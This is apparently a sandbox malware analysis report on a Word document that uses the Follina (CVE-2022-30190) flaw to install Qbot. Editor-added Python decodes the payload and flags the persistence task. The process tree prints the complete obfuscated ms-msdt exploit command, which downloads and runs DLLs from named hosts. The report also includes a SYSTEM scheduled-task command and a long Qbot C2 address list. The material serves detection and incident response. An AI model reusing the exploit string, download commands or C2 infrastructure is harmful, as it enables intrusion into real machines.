Analysis Report
doc782.docx
Overview
General Information
Detection
CryptOne, Follina CVE-2022-30190, Qbot
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Yara detected Qbot
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Sigma detected: Schedule system process
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Process Tree
- System is w10x64
- WINWORD.EXE (PID: 7032 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  - MSOSYNC.EXE (PID: 5960 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
  - MSOSYNC.EXE (PID: 5160 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
  - msdt.exe (PID: 2984 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
    - csc.exe (PID: 4480 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
      - cvtres.exe (PID: 1124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
    - csc.exe (PID: 4384 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
      - cvtres.exe (PID: 4536 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
    - regsvr32.exe (PID: 1320 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A MD5: 426E7499F6A7346F0410DEAD0805586B)
      - explorer.exe (PID: 4384 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
    - regsvr32.exe (PID: 5688 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A MD5: 426E7499F6A7346F0410DEAD0805586B)
      - explorer.exe (PID: 2256 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        - schtasks.exe (PID: 4456 cmdline: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06 MD5: 15FF7D8324231381BAD48A052F85DF04)
          - conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    - regsvr32.exe (PID: 4768 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A MD5: 426E7499F6A7346F0410DEAD0805586B)
      - explorer.exe (PID: 5492 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
    - csc.exe (PID: 5404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
      - cvtres.exe (PID: 4496 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- regsvr32.exe (PID: 6036 cmdline: regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A" MD5: D78B75FC68247E8A63ACBA846182740E)
  - regsvr32.exe (PID: 3976 cmdline: -s "C:\Users\user\AppData\Local\Temp\t1.A" MD5: 426E7499F6A7346F0410DEAD0805586B)
- cleanup
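The ms-msdt command line recorded for msdt.exe (PID 2984) is the whole exploit chain in one string: the IT_BrowseForFile parameter carries a PowerShell subexpression, the .NET call inside it is split with '+[char]58+' (colon) and '+[char]34+' (double quote) so that the literal text never contains `::FromBase64String("`, and the base64 is a UTF-16LE script. The following Python is added here by the editor and is not part of the Joe Sandbox report; it reproduces offline what the sandbox observed at runtime. MSDT_CMDLINE is the command line copied from the process tree with the extraction line breaks removed, SNORT_ALERT_SRC is the source address of the Snort alert listed further down, and is_follina_uri is the editor's own heuristic, not a published detection rule. `$(random)` in the decoded script is PowerShell's Get-Random alias, so each download gets a fresh random filename; the three `-OutFile` targets under `$Env:temp` are exactly the t.A, t1.A and t2.A files that the regsvr32.exe entries in the process tree load.

```python
"""Triage helper for the ms-msdt (Follina, CVE-2022-30190) command line in this report.

Added example by the editor, not part of the Joe Sandbox report. It reproduces
offline what msdt.exe did at runtime: resolve the '+[char]N+' string
concatenation that hides the .NET call, base64-decode the UTF-16LE payload,
and list the download URLs and regsvr32 targets the payload would produce.
"""
import base64
import re

# msdt.exe command line as recorded in the process tree (PID 2984), with the
# extraction line breaks removed. The traversal tail is 14 x "../" as recorded.
MSDT_CMDLINE = (
    'C:\\Windows\\system32\\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param '
    '"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile='
    "$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58"
    "+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('"
    "+[char]34+'"
    "JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABw"
    "ADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEA"
    "bgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0"
    "AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUA"
    "NQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1"
    "AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAA"
    "OgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBh"
    "AG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwA"
    "dAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBl"
    "AGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMA"
    "MgAgACQAcABcAHQAMgAuAEEA"
    "'+[char]34+'))'))))i/../../../../../../../"
    "../../../../../../../Windows/System32/mpsigstub.exe"
)

# Source IP of the Snort alert in this report, checked against the decoded URLs.
SNORT_ALERT_SRC = "185.234.247.119"

CHAR_CAST = re.compile(r"\[char\](\d+)")
B64_CALL = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')
URL = re.compile(r"""https?://[^\s;'"]+""")
REGSVR = re.compile(r"regsvr32\s+([^\s;]+)")


def resolve_char_concat(s: str) -> str:
    """Turn '...'+[char]58+[char]58+'...' into one literal ('...::...').

    Each [char]N becomes a quoted one-character string, then the '+' glue
    between adjacent literals is removed. Sufficient for this sample; a
    payload emitting [char]39 (a single quote) would need a real tokenizer."""
    s = CHAR_CAST.sub(lambda m: "'" + chr(int(m.group(1))) + "'", s)
    return s.replace("'+'", "")


def decode_payload(cmdline: str) -> str:
    """Return the PowerShell that the ms-msdt URI ends up running, as text."""
    flat = resolve_char_concat(cmdline)
    m = B64_CALL.search(flat)
    if not m:
        raise ValueError("no FromBase64String(...) call found")
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
    # .NET "Unicode" is UTF-16LE, the same encoding -EncodedCommand uses.
    return base64.b64decode(b64).decode("utf-16-le")


def extract_iocs(script: str) -> dict:
    """Pull download URLs, their hosts, and regsvr32 targets from the script."""
    urls = URL.findall(script)
    return {
        "urls": urls,
        "hosts": sorted({u.split("/")[2] for u in urls}),
        "regsvr32_targets": REGSVR.findall(script),
    }


def is_follina_uri(cmdline: str) -> bool:
    """Editor's heuristic, not a published rule: an ms-msdt URI whose
    IT_BrowseForFile parameter carries a PowerShell subexpression."""
    low = cmdline.lower()
    return "ms-msdt:" in low and "it_browseforfile=$(" in low


if __name__ == "__main__":
    script = decode_payload(MSDT_CMDLINE)
    print(script)
    iocs = extract_iocs(script)
    print(iocs)
    print("Snort alert source appears in payload:", SNORT_ALERT_SRC in iocs["hosts"])
```

Running the block prints the decoded script (`$p = $Env:temp;iwr http://104.36.229.139/$(random).dat -OutFile $p\t.A;...;regsvr32 $p\t2.A`) and the three download hosts. The third host, 185.234.247.119, is the source of the Snort alert below, which ties the network detection back to the document rather than to the Qbot stage; 104.36.229.139 and 85.239.55.228 produce no alert in this report, so a responder should block all three, not only the one the IDS flagged.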
Malware Configuration (Qbot, from the Malware Configuration Extractor). The Campaign value 1654596660 is a Unix timestamp, 2022-06-07 10:11:00 UTC, the same day as this analysis; the C2 list is mostly residential addresses on 443/995/2222, which is typical Qbot proxy-bot infrastructure rather than dedicated servers.

```json
{"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22",
"40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222", "42.228.224.249:2222", "172.114.160.81:995", "94.26.122.9:995", "75.99.168.194:443", "189.253.206.105:443", "81.215.196.174:443", "46.107.48.202:443"]}
```
Yara Overview

Rule | Description | Author
---|---|---
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security

Rule | Description | Author
---|---|---
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security

(both rules match on each of the three entries listed)

Rule | Description | Author
---|---|---
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security

(18 entries)

Rule | Description | Author
---|---|---
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security

(25 entries)
Persistence and Installation Behavior |
---|
Uses schtasks.exe or at.exe to add and modify task schedules: the process tree records schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, a one-shot task that reloads the dropped DLL as SYSTEM and, because of /Z, deletes itself after running. |

Snort IDS alert for network traffic |
---|
Source: | Joe Security |
Timestamp: | 06/07/22-19:44:37.058628 |
SID: | 2036726 |
Source IP: | 185.234.247.119 |
Source Port: | 80 |
Destination IP: | 192.168.2.22 |
Destination Port: | 49171 |
Protocol: | TCP |
Classtype: | Attempted User Privilege Gain |
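The schtasks.exe line spawned from the injected explorer.exe (PID 4456) is the persistence item this category refers to. The following Python is added here by the editor and is not part of the Joe Sandbox report; it parses that command line exactly as recorded and lists what a responder should flag. SCHTASKS_CMDLINE is copied from the process tree; parse_schtasks and task_findings are the editor's own helpers, not a Joe Security signature. shlex in POSIX mode is used because it treats a backslash before a double quote inside a quoted argument as an escape, which is what the nested quoting in the /tr value relies on, while leaving the backslashes in the Windows paths untouched. Note that the task runs regsvr32.exe by bare name, so it resolves to the 64-bit copy in System32; the last two process-tree entries (regsvr32.exe PID 6036 with a different MD5 spawning a second regsvr32.exe with only the -s argument) are consistent with the 64-bit regsvr32 handing a 32-bit DLL to its SysWOW64 counterpart.

```python
"""Scheduled-task triage for the schtasks.exe /Create line in this report.

Added example by the editor, not part of the Joe Sandbox report. It splits the
recorded command line into arguments (shlex in POSIX mode resolves the
backslash-escaped quotes inside the /tr value), walks the /option value pairs,
and lists the reasons this task creation looks like malware persistence.
"""
import shlex

# schtasks.exe command line as recorded in the process tree (PID 4456).
SCHTASKS_CMDLINE = (
    '"C:\\Windows\\system32\\schtasks.exe" /Create /RU "NT AUTHORITY\\SYSTEM" '
    '/tn swyghewz /tr "regsvr32.exe -s \\"C:\\Users\\user\\AppData\\Local\\Temp\\t1.A\\"" '
    '/SC ONCE /Z /ST 19:54 /ET 20:06'
)


def parse_schtasks(cmdline: str) -> dict:
    """Map each /OPTION (upper-cased) to its value, or True for bare flags.

    Inside double quotes POSIX shlex keeps a backslash that does not precede a
    quote or another backslash, so C:\\Users\\... survives while \\" becomes "."""
    tokens = shlex.split(cmdline, posix=True)
    opts = {"exe": tokens[0]}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if not tok.startswith("/"):
            i += 1  # stray value with no option to attach it to
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if nxt is None or nxt.startswith("/"):
            opts[tok.upper()] = True  # bare flag such as /Create or /Z
            i += 1
        else:
            opts[tok.upper()] = nxt
            i += 2
    return opts


def task_findings(opts: dict) -> list:
    """Reasons a responder would flag this task; empty for a benign query."""
    findings = []
    run_as = str(opts.get("/RU", "")).upper()
    action = str(opts.get("/TR", "")).lower()
    if run_as.endswith("SYSTEM"):
        findings.append("runs as NT AUTHORITY\\SYSTEM")
    if "regsvr32" in action:
        findings.append("action is regsvr32 (loads the DLL and calls DllRegisterServer)")
    if "\\appdata\\local\\temp\\" in action:
        findings.append("action loads a file from the user's Temp directory")
    if opts.get("/SC") == "ONCE" and opts.get("/Z") is True:
        findings.append("one-shot trigger with /Z: the task deletes itself after running")
    return findings


if __name__ == "__main__":
    task = parse_schtasks(SCHTASKS_CMDLINE)
    for key, value in task.items():
        print(f"{key:8} {value}")
    for reason in task_findings(task):
        print("FLAG:", reason)
```

The /Z flag is the detail worth remembering for forensics: once the task has fired at 19:54 it is removed, so a later `schtasks /Query` or a look at `C:\Windows\System32\Tasks` will not show swyghewz; the creation is only visible in the process tree, in Task Scheduler operational logs, or in Security event 4698 if task auditing is enabled.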
AV Detection |
---|
Multi AV Scanner detection for submitted file (sources: Virustotal, ReversingLabs) |
Malware configuration extracted (source: Malware Configuration Extractor; see the Qbot configuration above) |